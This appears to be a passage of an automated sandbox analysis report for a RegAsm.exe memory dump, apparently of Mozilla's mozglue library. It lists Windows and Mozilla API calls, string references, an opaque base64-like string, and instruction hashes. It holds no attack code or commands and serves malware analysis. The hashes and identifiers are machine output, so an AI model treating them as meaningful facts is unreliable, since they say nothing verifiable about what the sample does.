                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6D3217
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6D3236
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D324B
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D3260
                                                                                                                                                                                                                                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6D327F
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D328E
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32AB
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32D1
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6D32E5
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6D32F7
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D346B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                                                                                                                    • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                                                                                                                    • API String ID: 3006643210-2417823192
                                                                                                                                                                                                                                                    • Opcode ID: 085bb64c36b7fbb9a0ef1ec1a67d2abbd11a365f8e9ac107876ca490ce804fca
                                                                                                                                                                                                                                                    • Instruction ID: fcd5ecd462e904fd011c80453fb30cea1be3495c127fea2f405e77f809f24d2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 085bb64c36b7fbb9a0ef1ec1a67d2abbd11a365f8e9ac107876ca490ce804fca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31611671A087418BC711CF38C85165AB7F5FFC6354F618B2DF8A5A3690EB30A54ACB46
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C75F618), ref: 6C736694
                                                                                                                                                                                                                                                    • GetThreadId.KERNEL32(?), ref: 6C7366B1
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7366B9
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7366E1
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F618), ref: 6C736734
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C73673A
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F618), ref: 6C73676C
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7367FC
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C736868
                                                                                                                                                                                                                                                    • RtlCaptureContext.NTDLL ref: 6C73687F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                    • String ID: WalkStack64
                                                                                                                                                                                                                                                    • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                    • Opcode ID: 4fdc189a5074fb80ea9d89e95870ddfeaec11be689ec0ae387d48bd1aba9bd7d
                                                                                                                                                                                                                                                    • Instruction ID: 70565c4ca3e46dddb33600cc37a569cf5a7f8396f99df0999a1f42f7d0d84383
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fdc189a5074fb80ea9d89e95870ddfeaec11be689ec0ae387d48bd1aba9bd7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5851C171A09310AFD711CF24CA48B5ABBF4FF89714F44892DF99887641DB70EA18CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • IRhnHTXxRuEexdud9PtLYk76/Wl4J/395cX7ybtoWbju6lkZAWlHY33yesnKq4dynLS4vzTHinJWtO2Z/f13fPmHHnlzRPhahAyV5SZ2yVm1LNcX2HbKjKY2VGijI70WSsybgTtP70XEztN7iuDO0/vJiHvK4Cwzw4otWO67vxQlJ8oyPgalvCiPVat4G4Qdj5xR9fYlZUGurlZ7TzWPVepo/TnH8nFJpzvHTkDKOrvBKSFIqtx5tAD07DxaEMHcebSA, xrefs: 6C6D45B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                    • String ID: IRhnHTXxRuEexdud9PtLYk76/Wl4J/395cX7ybtoWbju6lkZAWlHY33yesnKq4dynLS4vzTHinJWtO2Z/f13fPmHHnlzRPhahAyV5SZ2yVm1LNcX2HbKjKY2VGijI70WSsybgTtP70XEztN7iuDO0/vJiHvK4Cwzw4otWO67vxQlJ8oyPgalvCiPVat4G4Qdj5xR9fYlZUGurlZ7TzWPVepo/TnH8nFJpzvHTkDKOrvBKSFIqtx5tAD07DxaEMHcebSA
                                                                                                                                                                                                                                                    • API String ID: 3009372454-3481030271
                                                                                                                                                                                                                                                    • Opcode ID: 2ad7733eb1c942e110d62b5c6a2653b2a2280db973a63aebe3f208b693cea7c6
                                                                                                                                                                                                                                                    • Instruction ID: 24b88d1e509ccbd2aeace68e21c0938bee48a708d97972dbb779ec4affc62470
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad7733eb1c942e110d62b5c6a2653b2a2280db973a63aebe3f208b693cea7c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B1E671A041508FDB188F3CD8D07BD76A2AF46318F1A4669E416DBB96D7B1EC808B49
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D85F
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D86C
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D918
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D93C
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D948
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D970
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D976
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D982
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D9CF
                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C72DA2E
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72DA6F
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72DA78
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C72DA91
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72DAB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1195625958-0
                                                                                                                                                                                                                                                    • Opcode ID: c6e8021c2f7ac0d8ae9965d22c88af9a7e423ec80b4e08058af4ca89dee66400
                                                                                                                                                                                                                                                    • Instruction ID: 885f503b550baaa926592774f78e392e790ab9022b8a911aaba9423d0e5cf4c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6e8021c2f7ac0d8ae9965d22c88af9a7e423ec80b4e08058af4ca89dee66400
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F71AD756043049FCB00CF29C888BAABBF5FF89314F59857EE85A9B341DB34A944CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5E9D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E5EAB
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E5EB8
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5ECF
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6E6017
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4310: moz_xmalloc.MOZGLUE(00000010,?,6C6D42D2), ref: 6C6D436A
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6D42D2), ref: 6C6D4387
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6C6E5F47
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E5F53
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C6E5F5C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E5F66
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6E5F7E
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6C6E5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E5E8C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E605D
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E60CC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3711609982-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D4F0
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D4FC
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D52A
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D530
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D53F
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D55F
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C72D585
                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C72D5D3
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D5F9
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D605
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D652
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D658
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D667
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D6A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2206442479-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6D1EC1
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6D1EE1
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744), ref: 6C6D1F38
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E744), ref: 6C6D1F5C
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C6D1F83
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6D1FC0
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6D1FE2
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6D1FF6
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6D2019
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                                                    • String ID: Dul$Dul$MOZ_CRASH()$\ul
                                                                                                                                                                                                                                                    • API String ID: 2055633661-1337673199
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6F56D1
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6F56E9
                                                                                                                                                                                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6F56F1
                                                                                                                                                                                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C6F5744
                                                                                                                                                                                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6F57BC
                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C6F58CB
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F58F3
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6F5945
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F59B2
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C75F638,?,?,?,?), ref: 6C6F59E9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                    • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                    • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EC84
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71EC8C
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71ECA1
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71ECAE
                                                                                                                                                                                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C71ECC5
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71ED0A
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C71ED19
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C71ED28
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C71ED2F
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71ED59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C71EC94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                    • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6C736009
                                                                                                                                                                                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C736024
                                                                                                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qml,?), ref: 6C736046
                                                                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(?,Qml,?), ref: 6C736061
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C736069
